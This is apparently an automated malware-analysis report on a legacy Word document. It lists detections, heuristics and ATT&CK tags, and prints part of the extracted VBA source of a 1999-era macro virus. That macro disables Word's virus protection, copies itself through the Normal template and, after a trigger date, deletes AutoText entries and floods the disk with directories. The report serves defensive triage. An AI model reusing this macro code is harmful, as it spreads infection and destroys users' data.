MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including a Document_Open macro that disables virus protection and calls other subroutines. The presence of 'Doc.Dropper.Agent-6961836-0' and 'Win.Trojan.C-286' detections from ClamAV strongly suggests a dropper functionality. The macros likely attempt to download and execute a secondary payload, a common tactic for this type of malware.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6961836-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6961836-0
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 26,112 bytes but its declared streams total only 0 bytes — 26,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28255 bytes |
SHA-256: 1df8e211c1b74b73ed0a5c5ec4771da322e7b936b722d1763cb7c00e75b3e736 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
On Error GoTo dnew
Call copyfromtempl
dnew:
Exit Sub
End Sub
Private Sub Document_Open()
On Error GoTo Dopen
With Options
.VirusProtection = False
End With
Call copyfromtempl
Call copytotempl
Dopen:
Exit Sub
End Sub
Attribute VB_Name = "Funky"
Option Explicit
Public templpath, docouname, docname As String
Public autentriesn
Public autentriest
Public uname
Public newdirc, lengthdirc, NPath
Public w, x, z, y, doccount, projcount As Integer
Public mytemplate As Template
Const Funkydate = "13/ 08 / 99"
Public lengthn
Public fnamet, fnamet2, fnamed, fnamed2 As String
Sub Autoexec()
On Error GoTo exitsub
Application.Documents.Add
doccount = Application.Documents.Count
If doccount = 1 Then
GoTo copyto
ElseIf doccount > 1 Then
Normal.ThisDocument.ActiveWindow.Activate
End If
copyto:
Call copytotempl
Call copyfromtempl
Funkyday:
If Now() = Funkydate Or Now() > Funkydate Then
GoTo Funkystart
Else
GoTo exitsub
End If
Funkystart:
Call pagelay
Set mytemplate = ActiveDocument.AttachedTemplate
If mytemplate.AutoTextEntries.Count = 0 Then
For z = 1000 To 1 Step -1
Call newdir
Next z
Exit Sub
Else
For x = mytemplate.AutoTextEntries.Count To 1 Step -1
autentriesn = mytemplate.AutoTextEntries(x).Name
autentriest = mytemplate.AutoTextEntries(x).Value
Call Templatepath
Call dircreate
mytemplate.AutoTextEntries(x).Delete
If mytemplate.AutoTextEntries.Count = 0 Then
GoTo Message
End If
Next x
End If
Exit Sub
exitsub:
Exit Sub
Message:
Call sname
MsgBox "Hi, " & "< " & uname & " >" & Chr(13) & Chr(10) & Chr(13) & Chr(10) & "Sorry, did you say there are no more Autotext Entries? " & Chr(13) & Chr(10) & "Never mind, you should have enough information to replace it." & Chr(13) & Chr(10) & "Take a look at your Templates directory !!!", vbCritical, "Wipe-out !!!"
GoTo exitsub
End Sub
Sub Templatepath()
On Error GoTo exitsub
templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
If templpath = "" Then
templpath = "c:\office97\templates"
MkDir templpath
Else
templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
End If
Open templpath & "\Tpath.txt" For Output As 1#
Write #1, templpath
Close #1
exitsub:
End Sub
Sub dircreate()
On Error GoTo ending
lengthn = Len(autentriesn)
autentriesn = Trim(Mid(autentriesn, 1, lengthn - 1))
MkDir templpath & "\" & autentriesn
Open templpath & "\" & autentriesn & "\" & autentriesn & ".txt" For Output As 1#
Write #1, autentriest
Close #1
ending:
End Sub
Sub sname()
On Error GoTo exitsub
uname = Application.UserName
exitsub:
End Sub
Sub pagelay()
On Error GoTo exitsub
If ActiveWindow.View.SplitSpecial = wdPaneNone Then
ActiveWindow.ActivePane.View.Type = wdPageView
Else
ActiveWindow.View.Type = wdPageView
End If
exitsub:
End Sub
Sub newdir()
On Error GoTo wrfile
Call Templatepath
Open templpath & "\Tpath.txt" For Input As #1
Do While Not EOF(1)
Input #1, newdirc
Loop
Close #1
lengthdirc = Len(newdirc)
newdirc = Trim(Mid(newdirc, 1, lengthdirc))
NPath = Trim(Mid(newdirc, 4, lengthdirc))
MkDir newdirc & (z)
exitsub:
Exit Sub
wrfile:
Call errdircreate
GoTo exitsub
End Sub
Sub errdircreate()
On Error GoTo endnow
Open newdirc & (z) &
... (truncated)
|
|||
embedded_office_off00004000.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x4000 | 26112 bytes |
SHA-256: 4f83fa8da6a632776fba68b7f3e1ce99398743494427ab5e14a21b1685d8809f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.